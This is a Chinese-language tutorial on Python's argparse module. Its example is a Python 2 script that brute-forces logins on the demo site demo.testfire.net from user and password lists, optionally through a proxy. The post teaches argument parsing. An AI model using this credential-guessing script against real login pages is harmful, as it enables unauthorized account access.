一、简介:
argparse是python用于解析命令行参数和选项的标准模块,用于代替已经过时的optparse模块。argparse模块的作用是用于解析命令行参数,例如python parseTest.py input.txt output.txt –user=name –port=8080。
二、使用步骤:
1:import argparse
2:parser = argparse.ArgumentParser()
3:parser.add_argument()
4:parser.parse_args()
# -*- coding:utf-8 -*-
import argparse
import requests
import sys
def login(user, passwd, proxy):
if proxy:
proxy = {'http': proxy}
print proxy
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Referer': 'http://demo.testfire.net/bank/login.aspx',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
'uid': user,
'passw': passwd,
'btnSubmit': 'Login'
}
if proxy:
html = requests.post('http://demo.testfire.net/bank/login.aspx', proxies=proxy, headers=headers, data=data, allow_redirects=False, verify=False)
else:
html = requests.post('http://demo.testfire.net/bank/login.aspx', headers=headers, data=data, allow_redirects=False, verify=False)
if html.status_code == 302:
print u"[+] 爆破成功!!", user + '/' + passwd
else:
print u"[+] 爆破失败!!"
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=u"[+]-----------------NO JS 批量爆破测试-python版-----------------[+]")
parser.add_argument('-u', '--user', default=False, dest='user', help='specific one user')
parser.add_argument('-p', '--password', default=False, dest='password', help='specific one password')
parser.add_argument('-U', default=False, dest='User', help='specific a directory file of users')
parser.add_argument('-P', default=False, dest='Password',help='specific a directory file of passwords')
parser.add_argument('-D', '--dict', default=False, dest='dict',help='specific a dict file of users and passwords')
# parser.add_option('-T', '--target', default=False, help='specific the target dvwa brute force url')
parser.add_argument('--proxy', default=False, dest='proxy', help='use a http proxy')
args = parser.parse_args()
proxys = args.proxy
if not ((args.user or args.User) and (args.password or args.Password)) and not args.dict:
print parser.parse_args(['-h'])
sys.exit()
elif ((args.user or args.User) and (args.password or args.Password)) and args.dict:
print parser.parse_args(['-h'])
sys.exit()
elif (args.user or args.User) and (args.password or args.Password):
users = []
if args.user:
users.append(args.user)
else:
try:
user = open(args.User, 'r').readlines()
for i in user:
users.append(i[:-1])
except Exception, e:
raise e
passwords = []
if args.password:
passwords.append(args.password)
else:
try:
password = open(args.Password, 'r').readlines()
for i in password:
passwords.append(i[:-1])
except Exception, e:
raise e
for u in users:
for p in passwords:
print proxys
login(u, p, proxys)
elif args.dict:
account_list = []
try:
account = open(args.dict, 'r').readlines()
for D in account:
account_list.append(D)
except Exception, e:
raise e
for D in account_list:
#time2 = random.randint(2, 90)
u = D.split(':')[0].strip()
p = D.split(':')[1].strip()
login(u, p, proxys)
原文地址:https://segmentfault.com/a/1190000009564133
